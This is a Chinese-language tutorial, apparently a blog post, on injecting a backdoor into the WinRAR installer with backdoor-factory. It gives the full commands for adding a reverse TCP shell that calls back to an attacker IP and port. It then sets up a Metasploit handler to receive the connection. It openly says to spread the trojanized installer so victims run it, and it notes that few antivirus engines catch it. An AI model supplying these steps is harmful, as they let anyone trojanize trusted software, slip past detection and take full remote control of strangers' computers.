后门
这次我们用到的程序叫backdoor-factory,为完整的程序注入后门程序。具体的请网上查看。
在kali linux系统上集成了该程序,但是注入后的程序显示为空文件(大小为0).故在ubuntu上手动安装尝试了一下,看我们的网络是否够安全。
注入
1.下载程序
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
2.安装
sudo chmod +x ./install.sh
3.运行
sudo ./backdoor.py
4.选择目标文件
本次使用的软件为 https://rarlab.com/rar/winrar-x64-561.exe
之后将在此程序中注入后门
执行 ./babackdoor.py -f winrar-x64-561.exe -S
可以看到此程序支持代码注入
执行 ./babackdoor.py -f winrar-x64-561.exe -s show 查看支持哪几种注入方式
5.开始注入
执行 ./backdoor.py -f ./winrar-x64-561.exe -s reverse_shell_tcp_inline -H 172.17.170.38 -P 1234
reverse_shell_tcp_inline 注入方式
172.17.170.38 攻击者ip,之后受害者主机来访问该ip
1234 攻击者端口,之后受害者主机来访问该端口
选择注入的位置:
都可以,这里我们选择2
完成。可以在指定目录下找到该文件。
到这里就注入完成了。
控制
服务器等待中招的pc连接。
设置服务器。打开kali linux系统。
#msfconsole
msf> use multi/handler
msf exploit(handler)> set PAYLOAD windows/shell/reverse_tcp
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set LHOST 172.17.170.38
msf exploit(handler) > exploit
将注入好的程序散发出去。如果有计算机不幸中招。
当有中招的pc代开注入后门的程序后,服务器端会有响应。
可以看到172.17.172.223连入服务器。这时候,你就可以全权控制223这台主机了。
可以看到被控制的主机信息。(编码格式可能不对,出现乱码)
测试
对于注入后门程序的程序,会不会成功被检测到呢。我用的火绒杀毒,双击之后立马报警。
对于其他杀毒软件看看什么情况,可以看到能够查杀到此后门的杀毒软件并不多。
实际上,该程序官网下载的源文件也可能会被误杀
杀毒可以参考网站:
http://www.virscan.org/language/zh-cn/
https://www.virustotal.com/zh-cn/
参考
Backdoor factory – How to inject shell-code into windows application
